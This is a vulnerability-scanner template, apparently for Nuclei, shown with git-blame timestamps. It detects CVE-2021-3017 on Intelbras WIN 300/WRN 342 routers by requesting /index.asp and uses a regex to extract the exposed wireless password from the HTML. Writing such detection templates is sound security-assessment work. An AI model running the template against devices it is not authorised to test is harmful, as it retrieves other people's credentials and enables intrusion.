2021-08-14 06:32:59 +00:00
id : CVE-2021-3017
info :
2022-06-25 07:14:58 +00:00
name : Intelbras WIN 300/WRN 342 - Credentials Disclosure
2021-08-14 06:32:59 +00:00
author : pikpikcu
severity : high
2022-04-22 10:38:41 +00:00
description : Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.
2021-08-19 13:59:12 +00:00
reference :
2021-08-14 08:28:04 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-3017
2022-05-17 09:18:12 +00:00
- https://pastebin.com/cTYTf0Yn
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-3017
2023-07-11 19:49:27 +00:00
epss-score : 0.0151
cpe : cpe:2.3:o:intelbras:win_300_firmware:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.85325
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : intelbras
product : win_300_firmware
tags : cve,cve2021,exposure,router
2021-08-14 06:32:59 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-08-14 06:32:59 +00:00
- method : GET
path :
- "{{BaseURL}}/index.asp"
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-08-14 06:32:59 +00:00
words :
- 'def_wirelesspassword ='
2021-08-14 08:26:56 +00:00
- '<title>Roteador Wireless</title>'
2021-08-14 08:33:43 +00:00
condition : and
2021-08-14 06:32:59 +00:00
- type : status
status :
- 200
2021-08-14 08:26:56 +00:00
extractors :
- type : regex
regex :
- 'def_wirelesspassword = "([A-Za-z0-9=]+)";'
2023-07-11 19:49:27 +00:00
part : body